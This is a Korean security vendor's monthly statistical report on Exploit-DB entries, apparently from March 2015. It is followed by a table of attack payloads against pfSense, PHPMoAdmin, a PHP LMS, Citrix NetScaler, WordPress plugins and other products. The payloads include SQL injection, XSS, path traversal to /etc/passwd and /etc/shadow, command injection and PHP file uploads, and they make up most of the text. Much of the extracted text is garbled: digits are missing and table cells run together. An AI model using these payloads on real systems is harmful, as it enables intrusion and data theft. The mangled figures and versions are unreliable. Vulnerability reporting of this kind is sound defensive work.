EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 05 년 3 월에공개된 Exploit-DB 의분석결과, Cross Site Scripting ( 이, XSS) 공격에대한보고가가장많았습니다. 분석된 XSS 공격들은매우낮은난이도를요구는공격인반면, 치명적인 차피해가일어날수있는공격입니다. 이와관련여특히주목할점은, 금월에가장많은이보고된 Open Source 기반 LMS 에서발생가능한 XSS 공격입니다. 따라서, 해당소프트웨어를사용고있는관리자는보안패치, 시큐어코딩등을실시여 XSS 공격에노출되지않도록각별한주의가필요합니다. 금월에는시스템의패스워드파일을노리는 Command 공격도발견되었습니다. 공격자가시스템상의주요파일을얻어낸경우보다쉽게시스템이탈취될수있습니다. 해당에노출되지않도록높은보안수준유지를권고합니다.. 별보고개수 보고개수 XSS 6 LFI 5 Command 3 File Upload 총합계 47 70 60 50 40 30 0 0 0 별보고개수 6 3 4 6 XSS LFI File Upload 총합계. 위험도별분류위험도 보고개수 백분율 상 6 34.04% 3 65.96% 0 0.00% 합계 47 00.00% 위험도별분류 40 상 3. 공격난이도별현황공격난이도 보고개수 백분율 상 5 0.64% 5 0.64% 37 78.7% 총합계 47 00.00% 공격난이도별현황 4 37 상 4. 주요소프트웨어별발생현황소프트웨어이름 pfsense PHPMoAdmin Bedita CMS ProjectSend Bester Elastix Codoforum Codiad WoltLab Triton and Websense appliance modules V-Series Citrix NetScaler EMC M&R (Watch4Net) Berta 총합계 보고개수 9 6 6 5 3 3 47 3 7 주요소프트웨어별발생현황 7 7 u5cms phpbugtracker Magento Server Zeuscart Piwigo etouch SamePage WeBid StaMPi Sefrengo Redaxscript Pragyan Pandora IBM Endpoint Manager Fork Exponent ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 36435 XSS LMS.9.0 - agenda_list.php XSS 36435 XSS LMS.9.0 - outbox.php XSS 36435 XSS LMS.9.0 - student.php XSS 36435 XSS LMS.9.0 - ajax_get_file_listing.php XSS 36435 XSS LMS.9.0 - configure_extensions.php XSS 36435 XSS LMS.9.0 - course_category.php XSS 36435 XSS LMS.9.0 - session_edit.php XSS 36435 XSS LMS.9.0 - system_status.php XSS 36435 XSS LMS.9.0 - session_add.php XSS 36385 Simple Photo Gallery v.0 - index.php 36435 상 상 ECommerce-WD Plugin..5 - index.php
EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 36464 상 상 Spider FAQ - index.php 36560 상 Gallery WD - index.php 3656 Contact Form Maker.0. - index.php 36563 Gallery WD - index.php 36506 XSS status_captiveportal.php XSS pfsense 36506 XSS firewall_rules.php XSS pfsense 36506 XSS firewall_shaper.php XSS pfsense 36506 XSS services_unbound_acls.php XSS pfsense 36506 XSS diag_logs_filter.php XSS pfsense 36506 LFI 상 system_firmware_restorefullbackup.php LFI pfsense 3658 상 CMS.0..8 - /fiyo/dapur/index.php 3658 상 상 CMS.0..8 - article_list.php 3658 CMS.0..8 - check_user.php 3658 LFI 상 CMS.0..8 - browse.php LFI 3658 XSS CMS.0..8 - /fiyo/ XSS
EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-03-0 365 Command PHPMoAdmin - moadmin.php Command /moadmin/moadmin.php HTTP/. User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 0.0; rv:36.0) Gecko/0000 Firefox/36.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/ *;q=0.8 Connection: keep-alive Content-Type: application/x-www-form-urlencoded PHPMoAdmin PHPMoAdmin object=;system('id;ls -lha');exit 05-03-0 3630 상 05-03-03 364 상 Calculated Fields Form Plugin.0.0 - options-general.php Theme Photocrati 4.x.x /wp-admin/optionsgeneral.php?page=cp_calculated_fields_form&u= or =&name=inserttext /wp-content/themes/photocrati-path-theme/ecommsizes.php?prod_id= or = Calculated Fields Form Plugin.0.0 Theme Photocrati 4.x.x 05-03-04 3665 XSS Bedita CMS - savemailgroups XSS /bedita- 3.5.0.corylus.6e9/bedita/index.php/newsletter/saveM ailgroups HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Bedita CMS Bedita CMS 3.5.0 data[mailgroup][id]=&data[mailgroup][group_name]=<sc ript>alert(0)</script> 05-03-06 36303 상 05-03-06 36306 상 ProjectSend r56 - useredit.php Bester v.0.4 - showprofile.php /projectsend/users-edit.php?id= or = /showprofile.php?id=' and = union select,concat(0x3a3a,0x55736573d,user(),0x0c04445f4 e66d653d,database(),0x3a3a),3,4,5,6,7-- ProjectSend Bester ProjectSend r56 Bester v.0.4 05-03-07 36305 상 Elastix v.x - iridium_threed.php /abilling/customer/iridium_threed.php?transactionid=- and =benchmark(000000,md5()) Elastix Elastix v.x 05-03-08 36374 File Upload 상 File Upload /wordpress/wp-content/plugins/reflexgallery/admin/scripts/fileuploader/php.php?year=05& Month=03 HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f Plugin Reflex Gallery 3..3 -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="php.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05-03-0 363 상상 v0.0. - index.php /index.php?page=' union all select,,(select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,),4,5,6,7,8,9,0 and 'j'='j v0.0. 05-03-0 363 상상 v0.0. - login.php /genixcms/gxadmin/login.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 password=&username=' and(select from(select count(*),concat((select (select (select concat(unhex(hex(cast(user.userid as char))),0x3a,unhex(hex(cast(user.pass as char)))) from `genixcms`.user limit 0,) ) from `information_schema`.tables limit 0,),floor(rand(0)*))x from `information_schema`.tables group by x)a) and ''='&login= v0.0. 05-03-0 363 XSS v0.0. - index.php XSS /index.php?page=<script>confirm("zsl")</script>' v0.0. 05-03-0 3630 LFI Codoforum v.5. - index.php LFI /index.php?u=serve/attachment&path=../../../../../sites/def ault/config.php Codoforum Codoforum v.5. 05-03- 3637 LFI Codiad v.5.3 - LFI /i/9756553/components/filemanager/download.php?pa th=../../../../../../../../../../../etc/passwd&type=undefined Codiad Codiad v.5.3
EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-03-3 36368 XSS WoltLab Community Gallery v.0 - index.php - XSS /7788bdbc/gallery/index.php/AJAXProxy/?t=7d53f8ad755 3c0f885e3ccb60edbc0b65d9eed HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 [title]=<script>alert('xss')</script> WoltLab WoltLab Community Gallery v.0 05-03-6 3644 XSS WPML v3..9 - XSS /?icl_action=reminder_popup&target=javascript:alert(/xss /);// WPML v3..9 05-03-6 36385 Simple Photo Gallery v.0 - index.php /index.php?option=com_simplephotogallery&view=images &albumid= or = Simple Photo Gallery v.0 05-03-7 3648 XSS v.5.9/v.6.8/v.7.5/v.8.3 - index.php /my/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 v.5.9/v.6.8/ v.7.5/v.8.3 config_title=" onmouseover=prompt("xss") > 05-03-7 3648 XSS v.5.9/v.6.8/v.7.5/v.8.3 /blog/index.php HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 v.5.9/v.6.8/ v.7.5/v.8.3 title=zsl"><script>alert("xss");</script> 05-03-8 3643 Command Triton v7.8.3 and Websense /appmng/servlet/commandlineservlet?type=exec&uuid=as appliance modules V-Series v7.7 dfasdf&module=na&command=ping&destination=7.0. - Command 0.' cat%0/etc/shadow' Triton and Websense appliance modules V- Series Triton v7.8.3 and Websense appliance modules V- Series v7.7 05-03-9 36435 XSS LMS.9.0 - agenda_list.php XSS /main/calendar/agenda_list.php?type=personal%7%0o nmouseover=%7confirm%80%9%7/%3e%3c!-- LMS.9.0 05-03-9 36435 XSS LMS.9.0 - outbox.php XSS /main/messages/outbox.php?f=social"+onmouseover="co nfirm(0) LMS.9.0 05-03-9 36435 XSS 05-03-9 36435 XSS 05-03-9 36435 XSS LMS.9.0 - student.php XSS LMS.9.0 - ajax_get_file_listing.php XSS LMS.9.0 - configure_extensions.php XSS /main/myspace/student.php?keyword=3337"+onmouse over=confirm(0)//&active=0&_qf search_user=&submit= Search /main/inc/lib/fckeditor/editor/plugins/ajaxfilemanager/ajax _get_file_listing.php?editor=stand_alone&view=thumbnail &search=&search_name=admin&search_recursively=0&se arch_mtime_from=&search_mtime_to=&search_folder=;</ script><script>confirm(0)</script> /main/admin/configure_extensions.php?display=</script>< script>confirm(0)</script> LMS.9.0 LMS.9.0 LMS.9.0 05-03-9 36435 XSS LMS.9.0 - /main/admin/course_category.php?action=add&category= course_category.php XSS "/><script>confirm(0)</script> LMS.9.0 05-03-9 36435 XSS LMS.9.0 - session_edit.php XSS /main/admin/session_edit.php?page=resume_session.php %%0onmouseover=confirm%80%9 LMS.9.0 GET /main/admin/system_status.php?section=webserver 05-03-9 36435 XSS LMS.9.0 - system_status.php XSS HTTP/. LMS.9.0 User-Agent: <script>confirm(0)</script>
EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-03-9 36435 XSS LMS.9.0 - session_add.php XSS /main/admin/session_add.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows LMS.9.0 formsent=&name=<script>confirm(0)</script>&coach_us ername=rehan&session_category=0&nb_days_acess_befor e=0&nb_days_acess_after=0&start_limit=on&day_start= &month_start=3&year_start=05&end_limit=on&day_en d=&month_end=3&year_end=06&session_visibility= /index.php?option=com_ecommercewd&controller=produ cts&task=displayproducts HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows 05-03-9 36435 상상 ECommerce-WD Plugin..5 - index.php product_id=&product_count=&product_parameters_json= &search_name=&search_category_id=) AND (SELECT 558 FROM(SELECT COUNT(*),CONCAT(0x7786a6b7,(SELECT (ELT(558=558,))),0x7706a6a7,FLOOR(RAND(0)*)) x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (857=857&filter_filters_opened=&filter_manufacturer_ ids=&filter_price_from=&filter_price_to=&filter_date_add ed_range=0&filter_minimum_rating=0&filter_tags=&arran gement=thumbs&sort_by=&sort_order=asc&pagination_li mit_start=0&pagination_limit= ECommerce- WD Plugin..5 05-03-9 3644 Command Citrix NetScaler SDX svm-0.5-50-.9 - Command /nitro/v/config/xen_hotfix HTTP/. User-Agent: Mozilla/5.0 Windows NT 6.; WOW64 Chrome/6.0.9.75 Safari/535.7 Citrix NetScaler Citrix NetScaler SDX svm-0.5-50-.9 object={"params"%3a{"action"%3a"start"}%c"xen_hotfi x"%3a[{"file_name"../../etc/passwd;reboot;"}]} 05-03-9 36440 LFI 05-03- 36464 상 상 05-03-6 36506 XSS 05-03-6 36506 XSS 05-03-6 36506 XSS 05-03-6 36506 XSS 05-03-6 36506 XSS EMC M&R (Watch4Net) prior v6.5u Spider FAQ - index.php status_captiveportal.php XSS firewall_rules.php XSS firewall_shaper.php XSS services_unbound_acls.php XSS diag_logs_filter.php XSS /devicediscovery/devicesource/downloadseedfile?filefilename=.. \..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\wind ows\system3\drivers\etc\hosts /index.php?option=com_gallery_wd&view=gallerybox&im age_id=9&gallery_id=&theme_id=%0and%0(sele CT%0673%0FROM(SELECT%0COUNT(*),CONCAT( 0x76b6787,(MID((IFNULL(CAST(database()%0AS% 0CHAR),0x0)),,50)),0x76a6a77,FLOOR(RAND(0)*) )x%0from%0information_schema.character_ SETS%0GROUP%0BY%0x)a) /status_captiveportal.php?zone=%7%%3e%3cscript %3Ealert%8%7ImmuniWeb%7%9;%3C/script%3E /firewall_rules.php?undodrag=&dragtable=&if=%7% %3E%3Cscript%3Ealert%8%7ImmuniWeb%7%9 ;%3C/script%3E /firewall_shaper.php?interface=wan&action=add&queue= %7%%3E%3Cscript%3Ealert%8%7ImmuniWeb %7%9;%3C/script%3E /services_unbound_acls.php?act=edit&id=%7%%3e %3Cscript%3Ealert%8%7ImmuniWeb%7%9;%3C/ script%3e /diag_logs_filter.php?filterlogentries_submit=&filterlogen tries_time=%7%%3e%3cscript%3ealert%8%7im muniweb%7%9;%3c/script%3e EMC M&R (Watch4Net) EMC M&R (Watch4Net) prior v6.5u Spider FAQ 05-03-6 36506 LFI 상 system_firmware_restorefullbac kup.php LFI /system_firmware_restorefullbackup.php?deletefile=../etc/ passwd
EDB 분석보고서 (05.03) 05.03.0~05.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 05-03-7 3650 File Upload 상 Berta CMS upload.php File Upload /engine/upload.php?entry=true&mediafolder=.all HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows Content-Type: multipart/form-data; boundary=--------------- ------------7dd009908f Berta Berta CMS -----------------------------7dd009908f Content-Disposition: form-data; name="filedata"; filename="c.php" Content-Type: application/octet-stream <? phpinfo();?> -----------------------------7dd009908f-- 05-03-30 36560 상 Gallery WD - index.php /index.php?option=com_gallery_wd&view=gallerybox&im age_id=9&gallery_id=&theme_id=%0and%0(sele CT%0673%0FROM(SELECT%0COUNT(*),CONCAT( 0x76b6787,(MID((IFNULL(CAST(database()%0AS% 0CHAR),0x0)),,50)),0x76a6a77,FLOOR(RAND(0)*) )x%0from%0information_schema.character_ SETS%0GROUP%0B/Y%0x)a) Gallery WD 05-03-30 3656 05-03-30 36563 05-03-3 3658 상 Contact Form Maker.0. - index.php Gallery WD - index.php CMS.0..8 - /fiyo/dapur/index.php /index.php?option=com_contactformmaker&view=contact formmaker&id=%0and%0= /index.php?option=com_gallery_wd&view=gallerybox&im age_id=9&gallery_id=&theme_id=%0and%0(sele CT%0673%0FROM(SELECT%0COUNT(*),CONCAT( 0x76b6787,(MID((IFNULL(CAST(database()%0AS% 0CHAR),0x0)),,50)),0x76a6a77,FLOOR(RAND(0)*) )x%0from%0information_schema.character_ SETS%0GROUP%0BY%0x)a) /fiyo/dapur/index.php?app=user&act=edit&id=%0unio N%0ALL%0SELECT%0NULL,NULL,CONCAT(0x776 7647,0x6645707046445786c58,0x76a76747),NULL, NULL,NULL,NULL,NULL,NULL,NULL# Contact Form Maker.0. Contact Form Maker.0. CMS.0..8 05-03-3 3658 상상 CMS.0..8 - article_list.php /fiyo/dapur/apps/app_article/controller/article_list.php?cat =%7%0AND%0(SELECT%0435%0FROM(SELECT %0COUNT(*),CONCAT(0x7666f767,(SELECT%0(CA SE%0WHEN%0(435=435)%0THEN%0%0ELS E%00%0END)),0x76468767,FLOOR(RAND(0)*))x %0FROM%0INFORMATION_SCHEMA.CHARACTER_SE TS%0GROUP%0BY%0x)a)%0AND%0%7yeEe% 7=%7yeEe&user=%7%0UNION%0ALL%0SELECT %0NULL,CONCAT(0x7666f767,0x46557747546e6 b54,0x76468767),null,null,null,null,null,null,null,null#&level=' AND 6567=BENCHMARK(5000000,MD5(0x57586864)) AND 'hmlh'='hmlh CMS.0..8 05-03-3 3658 CMS.0..8 - check_user.php /fiyo/dapur/apps/app_user/controller/check_user.php HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows CMS.0..8 act=email&email=test@asdas.com' AND SLEEP(5) AND 'UjqT'='UjqT 05-03-3 3658 LFI 상 CMS.0..8 - browse.php LFI /fiyo//plugins/plg_kcfinder/browse.php?type=files&lng=en &act=download HTTP/. User-Agent: Mozilla/5.0 (compatible; MSIE 0.0; Windows CMS.0..8 dir=files&file=../../../../../../../etc/passwd 05-03-3 3658 XSS CMS.0..8 - /fiyo/ XSS /fiyo/?app=article&view=item3ab"><script>alert()</scri pt>0ccba&id=86 CMS.0..8